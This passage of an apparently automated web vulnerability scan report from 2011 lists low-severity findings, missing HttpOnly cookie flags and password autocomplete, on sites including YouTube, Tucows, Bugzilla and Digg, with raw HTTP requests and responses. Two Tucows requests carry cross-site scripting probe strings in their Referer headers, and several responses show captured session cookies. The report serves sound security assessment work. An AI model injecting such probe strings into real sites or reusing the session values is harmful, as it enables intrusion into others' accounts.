Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:30:50 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: 1-2-HP=1172830883; Domain=wix.com; Expires=Sat, 05-Feb-2011 05:59:59 GMT; Path=/
Set-Cookie: userType=ANONYMOUS; Domain=.wix.com; Expires=Thu, 04-Feb-2016 01:34:40 GMT; Path=/
Set-Cookie: _wixRefX=null-referer; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wixRefX=null-referer; Domain=.wix.com; Expires=Tue, 02-Aug-2011 20:30:50 GMT; Path=/
Set-Cookie: _wixCampX=null-campaign; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wixCampX=null-campaign; Domain=.wix.com; Expires=Tue, 02-Aug-2011 20:30:50 GMT; Path=/
Set-Cookie: _wixExprX=null-expr; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wixExprX=null-expr; Domain=.wix.com; Expires=Tue, 02-Aug-2011 20:30:50 GMT; Path=/
Set-Cookie: _wixLndX=6457463; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wixLndX=6457463; Domain=.wix.com; Expires=Tue, 02-Aug-2011 20:30:50 GMT; Path=/
Set-Cookie: _wixTSX=1296765050363; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wixTSX=1296765050363; Domain=.wix.com; Expires=Tue, 02-Aug-2011 20:30:50 GMT; Path=/
Set-Cookie: _wixUIDX=null-user-id; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wixUIDX=null-user-id; Domain=.wix.com; Expires=Tue, 02-Aug-2011 20:30:50 GMT; Path=/
Set-Cookie: _wixCIDX=8e188904-2fa4-4f45-a7ad-f97f9710f96f; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wixCIDX=8e188904-2fa4-4f45-a7ad-f97f9710f96f; Domain=.wix.com; Expires=Tue, 02-Aug-2011 20:30:50 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 26616

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphp
...[SNIP]...

13.284. http://www.youtube.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?hl=en&tab=w1 HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:31:02 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=FZaZ02S4c3g; path=/; domain=.youtube.com; expires=Sat, 01-Oct-2011 20:31:02 GMT
Set-Cookie: PREF=f1=50000000; path=/; domain=.youtube.com; expires=Sun, 31-Jan-2021 20:31:02 GMT
Set-Cookie: GEO=0ac3bef9549e0537693aa5a5040a2cc1cwsAAAAzVVOtwdbzTUsQhg==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >
<!-- machid: nLThsU052OXJEdFVlejlPay04TThSVTJPX0JrcnNENkw4RWxMVVR1WXR6NTJ4UXVjZUZhZUVn -->
<head>
<script>
var yt = yt || {};

yt.timing
...[SNIP]...

13.285. http://www.youtube.com/results  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /results

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /results HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 303 See Other
Date: Thu, 03 Feb 2011 20:31:02 GMT
Server: wiseguy/0.6.7
Content-Length: 0
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=p_3XtJzUdAA; path=/; domain=.youtube.com; expires=Sat, 01-Oct-2011 20:31:02 GMT
Set-Cookie: PREF=f1=40000000; path=/; domain=.youtube.com; expires=Sun, 31-Jan-2021 20:31:02 GMT
Set-Cookie: GEO=3ffc2890db51791205b22cddaf014b18cwsAAAAzR0KtwdbzTUsQhg==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Location: http://www.youtube.com/das_captcha?next=http%3A//www.youtube.com/results
Connection: close


13.286. http://www.youtube.com/watch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /watch

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /watch HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 303 See Other
Date: Thu, 03 Feb 2011 20:31:11 GMT
Server: wiseguy/0.6.7
Content-Length: 0
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=6cozJg7zW60; path=/; domain=.youtube.com; expires=Sat, 01-Oct-2011 20:31:11 GMT
Set-Cookie: PREF=f1=40000000; path=/; domain=.youtube.com; expires=Sun, 31-Jan-2021 20:31:11 GMT
Set-Cookie: GEO=5215e3002360f495295dadfdb5ac7728cwsAAAAzR0KtwdbzTUsQjw==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Location: http://www.youtube.com/das_captcha?next=http%3A%2F%2Fwww.youtube.com%2Fwatch&ytsession=gFFnYQPQRZei0KJ49_8IeIUahsnsMHr7oYIMKK5868J_j-kq7g_jXG5m3SrDzR3dKcNGn9GPj25jQnXh4G8HkkqzZ4KyS4PLJ9PgHphPV3BzyZ9KSNO5Yk9UzwaXSGN_Vg0UM9PUXV8kUife1yyvmrlt6oT1dH8V1DiEtVG3Fz-7f617mCTcbAgfZe4Fpx0RMmVtvrYCqsf1wHg5fTeRc8GUfCDHSnQhnqRkOYpNTv0pe-bFnDwyyqbuY8D7akqvSIHIR5LqI0t4T4PmsSI2KXKOItHUgPZzsc2imD_xIVG2oSBseqOSnA
Connection: close


13.287. http://www8.tucows.com/delivery/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www8.tucows.com
Path:   /delivery/afr.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /delivery/afr.php?n=aed03704&zoneid=124&cb=d302be2a HTTP/1.1
Host: www8.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; OAID=f41efd0364d75038834b62f043c90f9a

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 02:06:21 GMT
Server: Apache/2.2.14 (Ubuntu)
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAGEO=US%7CTX%7C%7C%7C%7C%7C%7C%7C%7C%7C; path=/
Set-Cookie: OAID=f41efd0364d75038834b62f043c90f9a; expires=Sat, 04-Feb-2012 02:06:21 GMT; path=/
Set-Cookie: OAVARS[aed03704]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22933%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22124%22%3B%7D; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 3951

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...

13.288. http://www8.tucows.com/delivery/ck.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www8.tucows.com
Path:   /delivery/ck.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /delivery/ck.php?oaparams=2__bannerid=1590__zoneid=64__OXLCA=1__cb=761e27d268__oadest=http%3A%2F%2Fwww.vipreantivirus.com%2Fspeed-matters.cfm%3Ftucows-ros-300x250 HTTP/1.1
Host: www8.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; OAGEO=US%7CTX%7C%7C%7C%7C%7C%7C%7C%7C%7C; OAID=f41efd0364d75038834b62f043c90f9a; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 21:32:43 GMT
Server: Apache/2.2.14 (Ubuntu)
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: _OXLCA[1590]=lg296j-64; expires=Sat, 05-Mar-2011 21:32:43 GMT; path=/
Set-Cookie: OAID=f41efd0364d75038834b62f043c90f9a; expires=Fri, 03-Feb-2012 21:32:43 GMT; path=/
Location: http://www.vipreantivirus.com/speed-matters.cfm?tucows-ros-300x250
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html


13.289. http://www8.tucows.com/delivery/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www8.tucows.com
Path:   /delivery/lg.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /delivery/lg.php?bannerid=1441&campaignid=125&zoneid=8&loc=1&referer=http%3A%2F%2Fwww.tucows.com%2Fsoftware.html&cb=21d1a15d20 HTTP/1.1
Host: www8.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:35:17 GMT
Server: Apache/2.2.14 (Ubuntu)
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAGEO=US%7CTX%7C%7C%7C%7C%7C%7C%7C%7C%7C; path=/
Set-Cookie: OAID=c424a380ea4a424fb09f5190733f6726; expires=Fri, 03-Feb-2012 20:35:17 GMT; path=/
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14. Password field with autocomplete enabled  previous  next
There are 108 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


14.1. http://advertise.tucows.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: advertise.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:03:27 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=6299093c20d21df56a507e2d4f08aada; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 6299093c20d21df56a507e2d4f08aada=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 84850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Software and Sh
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.2. http://advertise.tucows.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET / HTTP/1.1
Host: advertise.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:03:27 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=6299093c20d21df56a507e2d4f08aada; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 6299093c20d21df56a507e2d4f08aada=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 84850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Software and Sh
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.3. https://author.tucows.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://author.tucows.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: author.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:03:52 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Connection: close
Content-Type: text/html
Content-Length: 13446

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>

<form name="login" action="/index.php" onSubmit="return validate(this);" method="post">
<input type="hidden" name="redirect" value="control_center.php">
...[SNIP]...
<br />
<input name="password" type="password" size="8"> <br />
...[SNIP]...

14.4. http://boardreader.com/my.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://boardreader.com
Path:   /my.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /my.html HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:31:23 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
</script>            
                                           <form name="mylogin_" action="/my/subscription.html" method="POST">
               <table cellpadding="0" cellspacing="0" border="0" align="center" >
...[SNIP]...
<td align="left">
                           <input class="yacc_input_text" style="margin-top:5px;width:100px;" type="password" id="pass" name="pass" value="" />
                       </td>
...[SNIP]...

14.5. https://bugzilla.mozilla.org/show_bug.cgi  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://bugzilla.mozilla.org
Path:   /show_bug.cgi

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /show_bug.cgi HTTP/1.1
Host: bugzilla.mozilla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Backend-Server: pm-app-bugs05
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Strict-transport-security: max-age=2629744; includeSubDomains
Date: Thu, 03 Feb 2011 22:03:58 GMT
Keep-Alive: timeout=300, max=1000
Connection: close
Content-Length: 12477

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Search by bug number</title>



...[SNIP]...
</a>
<form action="https://bugzilla.mozilla.org/show_bug.cgi" method="POST"
class="mini_login bz_default_hidden"
id="mini_login_top"
onsubmit="return check_mini_login_fields( '_top' );"
>

<input id="Bugzilla_login_top"
class="bz_login"
name="Bugzilla_login"
onfocus="mini_login_on_focus('_top')"
>
<input class="bz_password"
id="Bugzilla_password_top"
name="Bugzilla_password"
type="password"
>

<input class="bz_password bz_default_hidden bz_mini_login_help" type="text"
id="Bugzilla_password_dummy_top" value="password"
onfocus="mini_login_on_focus('_top')"
>
...[SNIP]...

14.6. https://bugzilla.mozilla.org/show_bug.cgi  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://bugzilla.mozilla.org
Path:   /show_bug.cgi

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /show_bug.cgi HTTP/1.1
Host: bugzilla.mozilla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Backend-Server: pm-app-bugs05
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Strict-transport-security: max-age=2629744; includeSubDomains
Date: Thu, 03 Feb 2011 22:03:58 GMT
Keep-Alive: timeout=300, max=1000
Connection: close
Content-Length: 12477

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Search by bug number</title>



...[SNIP]...
</a>
<form action="https://bugzilla.mozilla.org/show_bug.cgi" method="POST"
class="mini_login bz_default_hidden"
id="mini_login_bottom"
onsubmit="return check_mini_login_fields( '_bottom' );"
>

<input id="Bugzilla_login_bottom"
class="bz_login"
name="Bugzilla_login"
onfocus="mini_login_on_focus('_bottom')"
>
<input class="bz_password"
id="Bugzilla_password_bottom"
name="Bugzilla_password"
type="password"
>

<input class="bz_password bz_default_hidden bz_mini_login_help" type="text"
id="Bugzilla_password_dummy_bottom" value="password"
onfocus="mini_login_on_focus('_bottom')"

...[SNIP]...

14.7. https://bugzilla.mozilla.org/show_bug.cgi  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://bugzilla.mozilla.org
Path:   /show_bug.cgi

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /show_bug.cgi?id=378962 HTTP/1.1
Host: bugzilla.mozilla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Backend-Server: pm-app-bugs05
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Strict-transport-security: max-age=2629744; includeSubDomains
Date: Thu, 03 Feb 2011 22:03:58 GMT
Keep-Alive: timeout=300, max=1000
Connection: close
Content-Length: 59121

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Bug 378962 &ndash; firefox incorrectly decodeURI
...[SNIP]...
</a>
<form action="https://bugzilla.mozilla.org/show_bug.cgi?id=378962" method="POST"
class="mini_login bz_default_hidden"
id="mini_login_bottom"
onsubmit="return check_mini_login_fields( '_bottom' );"
>

<input id="Bugzilla_login_bottom"
class="bz_login"
name="Bugzilla_login"
onfocus="mini_login_on_focus('_bottom')"
>
<input class="bz_password"
id="Bugzilla_password_bottom"
name="Bugzilla_password"
type="password"
>

<input class="bz_password bz_default_hidden bz_mini_login_help" type="text"
id="Bugzilla_password_dummy_bottom" value="password"
onfocus="mini_login_on_focus('_bottom')"

...[SNIP]...

14.8. https://bugzilla.mozilla.org/show_bug.cgi  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://bugzilla.mozilla.org
Path:   /show_bug.cgi

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /show_bug.cgi?id=378962 HTTP/1.1
Host: bugzilla.mozilla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Backend-Server: pm-app-bugs05
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Strict-transport-security: max-age=2629744; includeSubDomains
Date: Thu, 03 Feb 2011 22:03:58 GMT
Keep-Alive: timeout=300, max=1000
Connection: close
Content-Length: 59121

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Bug 378962 &ndash; firefox incorrectly decodeURI
...[SNIP]...
</a>
<form action="https://bugzilla.mozilla.org/show_bug.cgi?id=378962" method="POST"
class="mini_login bz_default_hidden"
id="mini_login_top"
onsubmit="return check_mini_login_fields( '_top' );"
>

<input id="Bugzilla_login_top"
class="bz_login"
name="Bugzilla_login"
onfocus="mini_login_on_focus('_top')"
>
<input class="bz_password"
id="Bugzilla_password_top"
name="Bugzilla_password"
type="password"
>

<input class="bz_password bz_default_hidden bz_mini_login_help" type="text"
id="Bugzilla_password_dummy_top" value="password"
onfocus="mini_login_on_focus('_top')"
>
...[SNIP]...

14.9. http://digg.com/submit  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:35:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1168415921484595456%3A180; expires=Fri, 04-Feb-2011 19:35:44 GMT; path=/; domain=digg.com
Set-Cookie: d=0ff09a9ff26d23c27385462bc99e308f35991a0289651f6a22602a6a428198db; expires=Wed, 03-Feb-2021 05:43:24 GMT; path=/; domain=.digg.com
X-Digg-Time: D=21532 10.2.129.225
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7633

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

14.10. http://digg.com/submit  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /submit?phase=2&url=http://ir.supermedia.com/index.cfm? HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:35:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1168415921484595456%3A180; expires=Fri, 04-Feb-2011 19:35:44 GMT; path=/; domain=digg.com
Set-Cookie: d=9a81d04bc71053ddb307d64c049af82a3be90be8ba862b2a52714e2e4b2b499b; expires=Wed, 03-Feb-2021 05:43:24 GMT; path=/; domain=.digg.com
X-Digg-Time: D=33479 10.2.129.81
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7667

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

14.11. http://forums.digitalpoint.com/showthread.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://forums.digitalpoint.com
Path:   /showthread.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /showthread.php?t\\x3d1355583\\x22 HTTP/1.1
Host: forums.digitalpoint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:32:20 GMT
Server: Apache
Set-Cookie: bb_lastvisit=1296765140; expires=Fri, 03-Feb-2012 20:32:20 GMT; path=/; domain=.digitalpoint.com
